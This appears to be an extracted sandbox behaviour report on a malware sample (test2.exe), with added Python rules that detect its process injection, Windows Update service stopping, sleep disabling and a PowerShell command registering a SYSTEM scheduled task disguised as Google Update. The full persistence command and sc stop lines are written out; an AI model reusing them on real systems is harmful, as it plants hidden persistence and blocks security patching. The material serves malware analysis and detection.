      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: CA0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EFC9BA0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DE50F10000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17660BD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 11F7E5D0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20A36710000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14F491D0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A0A2600000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 22BEFFD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18C35FB0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 210BFBC0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 231A7AD0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 281ED520000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 1B29C900000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C3354B0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 20219540000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26F66570000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: BE0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C74BF50000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29902C80000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26C52290000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1DFBA830000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C27EF90000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: A850000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 240A7930000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 183ED2A0000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000
      Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\SettingSyncHost.exe base: 1FEFD650000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27ADB570000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C4355A0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17708DF0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0FD030000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 182E47D0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 21671A10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 700000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15357E10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 226DF760000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5EE060000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256199A0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BAD1F10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 298A7C30000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E928AC0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1AEC6560000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1CCAD210000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F4E9D50000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17E7E4F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1947A0F0000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Google\Chrome\updater.exe base: 2A663B10000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A49CF30000
      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 29C55440000
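The Memory written entries above record a single source, C:\Windows\System32\dialer.exe, writing into dozens of unrelated processes (svchost.exe, spoolsv.exe, explorer.exe, RuntimeBroker.exe, powershell.exe and others). That fan-out is the observable of the broad injection the report flags. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses lines in this report's Source / Memory written format and flags any source that writes into several distinct target images. The sample lines are constructed from the entries above; the threshold of three distinct targets and the test2.exe -> dialer.exe base address are assumptions.

```python
"""Added example (not from the report): fan-out heuristic over "Memory written"
observations. One process writing into many unrelated processes is the
observable of broad process injection (MITRE ATT&CK T1055)."""
import re
from collections import defaultdict

# Accepts the collapsed "...dialer.exeMemory written: ..." form of the extracted
# report as well as a "... | Memory written: ..." form; the "Jump to behavior"
# link text that trails some report lines is optional.
MEMWRITE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Memory written:\s*"
    r"(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)\s*(?:Jump to behavior)?$"
)

# Constructed sample modelled on the report entries; the final test2.exe line
# (and its base address) is assumed, not taken from the report.
SAMPLE = r"""
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 21CDFC50000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23236730000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: CA0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BB2B50000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: A850000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EC35F90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D37AF10000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C7FC420000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1AEC6560000
Source: C:\Users\user\Desktop\test2.exe | Memory written: C:\Windows\System32\dialer.exe base: 7FF6A3D40000
"""


def parse_memory_writes(text):
    """Return (source, target, base) tuples for every Memory written line."""
    events = []
    for line in text.splitlines():
        m = MEMWRITE_RE.match(line.strip())
        if m:
            events.append((m["src"], m["target"], m["base"].upper()))
    return events


def basename(path):
    # Windows paths: os.path.basename would not split on '\' on a POSIX host.
    return path.rsplit("\\", 1)[-1].lower()


def flag_injectors(events, min_targets=3):
    """Group writes by source image and flag sources that write into at least
    min_targets distinct target images (the threshold is an assumption)."""
    per_src = defaultdict(lambda: {"writes": 0, "targets": set(), "bases": set()})
    for src, target, base in events:
        rec = per_src[src]
        rec["writes"] += 1
        rec["targets"].add(basename(target))
        rec["bases"].add(base)
    hits = []
    for src, rec in per_src.items():
        if len(rec["targets"]) >= min_targets:
            hits.append({
                "source": src,
                "writes": rec["writes"],
                "distinct_targets": len(rec["targets"]),
                "targets": sorted(rec["targets"]),
                # A Windows binary under \Windows\System32 fanning out writes is the
                # hollowed-host pattern: dialer.exe is a phone dialer, not an injector.
                "system_binary_host": "\\windows\\system32\\" in src.lower(),
            })
    hits.sort(key=lambda h: h["distinct_targets"], reverse=True)
    return hits


if __name__ == "__main__":
    for hit in flag_injectors(parse_memory_writes(SAMPLE)):
        print(f"{hit['source']}: {hit['writes']} writes into "
              f"{hit['distinct_targets']} distinct images {hit['targets']}")
```

On the sample, only dialer.exe is flagged (nine writes into seven distinct images); test2.exe writes into a single target and stays below the threshold, which is the intended behaviour for a loader that only hollows its one host process.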
Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Windows\System32\dialer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Program Files\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
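The Process created entries above form one chain: sc.exe stops the Windows Update, Update Orchestrator, WaaS Medic, BITS and Delivery Optimization services, powercfg sets every sleep and hibernate timeout to 0 (never), and PowerShell registers a scheduled task as SYSTEM with the highest run level, named after Google Update but launching C:\Program Files\Google\Chrome\updater.exe, with the command line padded by a leading <#yaqvbk#> block comment. The Python below is an added example, not part of the Joe Sandbox report: it applies one rule per behaviour to lines in this report's Source / Process created format. The sample lines are constructed from the entries above (the sc stop Spooler control line is not in the report); the set of update services, the allowlist of genuine Google Update install directories and the ATT&CK mappings in the comments are this example's own assumptions.

```python
"""Added example (not from the report): per-behaviour rules over the
"Process created" observations of a miner dropper's persistence chain."""
import re
from collections import Counter

# Tolerates the collapsed "...cmd.exeProcess created: ..." extraction form, a
# "... | Process created: ..." form, and the trailing "Jump to behavior" link text.
PROC_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*"
    r"(?P<image>unknown|.+?\.exe)\s+(?P<cmdline>.*?)\s*(?:Jump to behavior)?$",
    re.IGNORECASE,
)

# Update-related services stopped in the report (assumed watch list).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Directories the genuine Google updater installs into (assumed allowlist).
GOOGLE_UPDATE_DIRS = ("\\google\\update\\", "\\google\\googleupdater\\")

# The PowerShell command line from the report, split only for readability.
PS_CMD = (
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe <#yaqvbk#> "
    r'if([system.environment]::osversion.version -lt [system.version]"6.2") '
    r"{ schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' "
    r"/tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask "
    r"-action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') "
    r"-trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset "
    r"-allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries "
    r"-dontstoponidleend -executiontimelimit (new-timespan -days 1000)) "
    r"-taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }"
)

# Constructed sample: report entries plus one control line (sc stop Spooler).
SAMPLE = "\n".join([
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop Spooler",
    r"Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0",
    r"Source: C:\Program Files\Google\Chrome\updater.exe | Process created: unknown unknown",
    r"Source: C:\Users\user\Desktop\test2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe " + PS_CMD,
])


def basename(path):
    # Windows paths: os.path.basename would not split on '\' on a POSIX host.
    return path.rsplit("\\", 1)[-1].lower()


def rule_stop_update_service(image, cmdline):
    """ATT&CK T1489 / T1562.001: 'sc stop' against an update-related service."""
    m = re.match(r"sc(?:\.exe)?\s+stop\s+(\S+)", cmdline, re.I)
    if basename(image) == "sc.exe" and m and m.group(1).lower() in UPDATE_SERVICES:
        return f"stops update service {m.group(1)}"
    return None


def rule_power_timeout_zero(image, cmdline):
    """ATT&CK T1653: sleep/hibernate timeout set to 0, i.e. never, so the miner keeps running."""
    if basename(image) == "powercfg.exe" and re.search(
            r"[/-]x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", cmdline, re.I):
        return "disables a sleep/hibernate timeout"
    return None


def rule_system_scheduled_task(image, cmdline):
    """ATT&CK T1053.005: task registered as SYSTEM with the highest run level."""
    low = cmdline.lower()
    creates = "register-scheduledtask" in low or ("schtasks" in low and "/create" in low)
    as_system = "-user 'system'" in low or "/ru 'system'" in low
    highest = "-runlevel 'highest'" in low or "/rl highest" in low
    return "registers SYSTEM scheduled task at highest run level" if creates and as_system and highest else None


def rule_updater_masquerade(image, cmdline):
    """Task named GoogleUpdateTaskMachine* whose action lies outside Google Update's install dirs."""
    low = cmdline.lower()
    names = re.findall(r"(?:-taskname|/tn)\s+'([^']+)'", low)
    actions = re.findall(r"(?:-execute|/tr)\s+'+([^']+)'+", low)
    if any(n.startswith("googleupdatetaskmachine") for n in names) and actions \
            and not any(d in a for a in actions for d in GOOGLE_UPDATE_DIRS):
        return f"Google Update task name but action is {actions[0]}"
    return None


def rule_junk_comment_prefix(image, cmdline):
    """PowerShell command line that opens with a <# ... #> block comment (padding seen above)."""
    if re.match(r"\S*powershell(?:\.exe)?\s+<#.*?#>", cmdline, re.I):
        return "command line starts with a junk block comment"
    return None


RULES = [rule_stop_update_service, rule_power_timeout_zero, rule_system_scheduled_task,
         rule_updater_masquerade, rule_junk_comment_prefix]


def parse(text):
    """Return (parent, image, cmdline) for every Process created line."""
    rows = []
    for line in text.splitlines():
        m = PROC_RE.match(line.strip())
        if m:
            rows.append((m["parent"], m["image"], m["cmdline"]))
    return rows


def analyze(text):
    findings = []
    for parent, image, cmdline in parse(text):
        for rule in RULES:
            detail = rule(image, cmdline)
            if detail:
                findings.append({"parent": parent, "image": image,
                                 "rule": rule.__name__, "detail": detail})
    return findings


def summarize(findings):
    """Hits per rule; service stops, zeroed power timeouts and a SYSTEM task together are the miner pattern."""
    return Counter(f["rule"] for f in findings)


if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f"{f['rule']:28} {basename(f['parent'])} -> {basename(f['image'])}: {f['detail']}")
```

On the sample this yields ten findings: five update-service stops, two zeroed power timeouts, and three on the single PowerShell line (SYSTEM task, Google Update masquerade, junk-comment prefix). The Spooler stop and the unknown child are parsed but produce nothing, which is the point of carrying a watch list rather than alerting on every sc stop.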
Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5740200225.000001F5E395F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5714749777.000001F5DCD31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5714749777.000001F5DCD31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000012.00000000.4430178071.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000012.00000002.5689013568.000002854DA41000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000018.00000002.5714749777.000001F5DCD31000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
